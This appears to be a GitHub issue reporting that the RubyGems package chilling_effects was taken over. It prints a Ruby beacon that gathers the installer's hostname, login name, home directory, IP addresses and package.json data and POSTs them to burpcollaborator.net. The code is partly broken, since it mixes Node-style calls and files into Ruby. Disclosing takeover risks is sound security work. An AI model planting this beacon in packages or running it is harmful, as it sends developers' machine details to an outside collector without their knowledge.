Gem Package Takeover - `chilling effects`
ManojSharma1997 opened this issue · comments
Hello benbalter,
I am writing to bring to your attention a significant security concern regarding an RubyGems package that I have recently discovered. I believe it poses a potential threat to the security of its users.
I found that chilling_effects
ruby gems package is available for takeover. Hence I had takenover this ruby gems package.
Exploit
If the team allows I can upload the following malicious code.
require 'net/http'
require 'json'
require 'os'
require 'socket'
require 'querystring'
packageJSON = JSON.parse(File.read('./package.json'))
package = packageJSON['name']
trackingData = {
p: package,
c: __dir__,
hd: Dir.home,
hn: Socket.gethostname,
un: Etc.getlogin,
dns: Socket.getaddrinfo(Socket.gethostname, nil, Socket::AF_INET).map { |addrinfo| addrinfo[3] },
r: packageJSON ? packageJSON['__resolved'] : nil,
v: packageJSON['version'],
pjson: packageJSON
}
postData = Querystring.stringify(msg: trackingData.to_json)
url = URI.parse('https://burpcollaborator.net') # replace burpcollaborator.net with Interactsh or pipedream
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = true
headers = {
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => postData.length.to_s
}
response = http.post(url.path, postData, headers)
puts response.body
POC
https://rubygems.org/gems/chilling_effects
Impact
An attacker can take over the package and when the developer will try this code, they will inject malicious code into their system by trusting chilling_effects
.
This will lead to Remote Code Execution.
Best Regards,
@predator_97